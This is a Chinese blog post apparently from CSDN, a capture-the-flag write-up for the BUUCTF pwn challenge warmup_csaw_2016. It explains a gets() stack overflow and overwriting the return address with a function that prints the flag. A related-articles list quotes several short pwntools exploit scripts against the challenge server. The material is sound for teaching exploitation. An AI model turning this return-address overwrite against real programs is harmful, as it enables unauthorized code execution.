BUUCTF warmup_csaw_2016

最新推荐文章于 2025-03-14 16:35:47 发布
原创 最新推荐文章于 2025-03-14 16:35:47 发布 · 410 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文详细介绍了如何通过分析64位二进制文件,利用gets函数的漏洞进行缓冲区溢出攻击,覆盖返回地址来执行特定命令。通过IDA逆向工程,发现sprintf函数使用%p输出内存地址,然后通过填充rbp寄存器的值,成功触发了catflag.txt命令,从而获取到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

BUUCTF  warmup_csaw_2016

 

下载文件,把它拖入虚拟机中,checksec一下

 

这是一个64位的文件,并且没有开启任何的保护

我们先运行一下试试

发现它给出了一个地址,我们先记下,可能会用到

放入64位IDA中查看一下他的代码

伪C代码↓

 

汇编代码↓

 

发现了一个函数sprintf,并且用%p的方式来输出,也就是输出地址

下面是我搜索到的关于 %p 的知识

 

我们双击40060D看一下

 

 

再回过头来看代码

众所周知gets函数是一个危险函数,所以我们要以它为pwn掉的点

gets接受v5变量传入的信息,而v5我们可以看到定义了40个字节,再把40060D的地址填充到gets函数分配的地址中就可以达到我们的目的

由此可见,我们可以利用覆盖返回地址来执行cat flag.txt这条命令

有了思路我们就开始编写脚本

 

运行一下试试

不正确,说明我们在填充字节的时候出错了

重新回过头看一下代码

 

发现我们忘记填充rbp了

32位的文件需要填充4个字节

64位的文件需要填充8个字节

重新修改脚本

 

运行脚本

 

成功拿到 flag !

buuctfwarmup_csaw_2016
weixin_54452942的博客
03-25 571
发现了一个gets函数可以溢出,并且在上面的运行中,我们看到他输出了一个地址,在下面的sprintf函数中将一个函数的地址输出了,我们去看看这个函数是干什么的。一种是ida直接看(不一定准),40h是64字节,再加8字节的rbp就是ret的位置。这里的返回地址,也就是rbp下面的地址是df28,我们输入的‘aaaaa’在dee0。是一个没有保护机制的64位x86架构的小端可执行程序。断在main函数地址,或者调用gets函数的地址也行。减一下刚好和ida中的一样。两种方式获得填充数据大小。
BUUCTF|warmup_csaw_2016 1
cm_zl
04-30 1372
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()
BUUCTF - PWNwarmup_csaw_2016
古月浪子的博客
03-19 3378
checksec一下,发现啥保护也没开 IDA打开看看,又是明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.s...
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 563
buuctf pwn
BUUCTFwarmup_csaw_2016
2201_75556700的博客
11-29 539
4、这里有两个数组都是64字节,在sprintf这里,将sub_40060D函数的地址存放在s中。题目一:【BUUCTFwarmup_csaw_2016。3、使用ida64分析文件,找到main函数,F5反汇编。2、下载附件,在kali中分析,64位,小端存储。5、查看函数sub_40060D,地址。03、权限不够时,添加权限就可以。04、使用r命令运行程序。05、使用n命令单步调试。01、使用gdb工具。
BUUCTF pwn前三道
2301_80470992的博客
12-21 1113
gets_s(buffer,size)函数:从标准输入中读取数据,size表示的最多读取的数量,在这里是argv,没有定义是多大,所以我们就可以无限的输入。但是可以发现buffer就只有0xF字节的大小,输入超过0xF个字节以后,你就会溢出,你会覆盖返回地址。代码分析:俩个write函数输出,然后sprintf函数利用%p将sub_40060函数地址(其实就是system函数)打印出来放到s里面,然后由write函数打印出来,由于是64位所以write那是9,存在溢出条件,接下来就是要找后门函数地址了。
buuctf warmup
01-13
对于warmup_csaw_2016这类涉及栈溢出覆盖返回地址的题目[^3],解决方法主要依赖于理解程序内存布局以及如何利用缓冲区溢出来控制程序流。 #### 利用栈溢出漏洞获取Flag 针对此类问题的一个常见策略是通过精心构建...
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 5456
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
[每日一PWN]BUUCTF warmup_csaw_2016
qq_55233040的博客
11-20 564
和第一题RIP一样,是经典而基础的ret2text。
BUUCTF-warmup_csaw_2016
m0_64180167的博客
04-11 507
64位的linux文件。
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 425
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 456
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 590
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
buuctf|warmup_csaw_2016 1
m0_64236521的博客
04-15 1718
buuctf|warmup_csaw_2016 1 下载文件运行如下 checksec查看下保护 file一下,是64位文件 拉进ida,发现gets(v5),查看v5,明显的栈溢出 找到system,地址40060d 直接exp from pwn import* p=remote('node4.buuoj.cn',28415) payload=b'A'*0x48+p64(0x40060D) p.sendline(payload) p.interactive() 得flag ...
BUUctf warmup_csaw_2016
最新发布
A_fish_like_sing的博客
03-14 420
buu ctf pwn warmup_csaw_2016
BUUCTF-PWN】3-warmup_csaw_2016
燕麦葡萄干的博客
07-04 321
checksec检查是64位,未开启任何保护。直接字符串查找system或者flag。后门函数的地址是0x40060D。gets()函数存在栈溢出。
[BUUCTF]PWN3——warmup_csaw_2016
mcmuyanga的博客
08-24 1105
[BUUCTF]3——warmup_csaw_2016 题目网址:https://buuoj.cn/challenges#warmup_csaw_2016 步骤: 例行检查,64位,没有开启任何保护 nc一下,看看输入点的字符串,看到回显了一个地址,之后让我们输入,输入完之后就退出了 用64位ida打开附件,首先shift+f12查看程序里的字符串,可以看到有一个“cat flag.txt”字符串引人注目 双击字符串跟进,ctrl+x查看哪个函数调用了这个字符串,找到函数后按f5反编译成我们熟悉的伪代
BUUCTF pwn——warmup_csaw_2016
CNS-Enterprise BCC-1701-J
03-11 189
BUUCTF 做题练习
warmup_csaw_2016 1
03-16
这是一道CSAW 2016年的预热题目,需要我们在给定的字符串中找到所有的数字,并将它们相加起来。 具体的做法是,我们可以遍历字符串中的每一个字符,判断它是否是数字,如果是数字就将它转换成整数并加到总和中。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值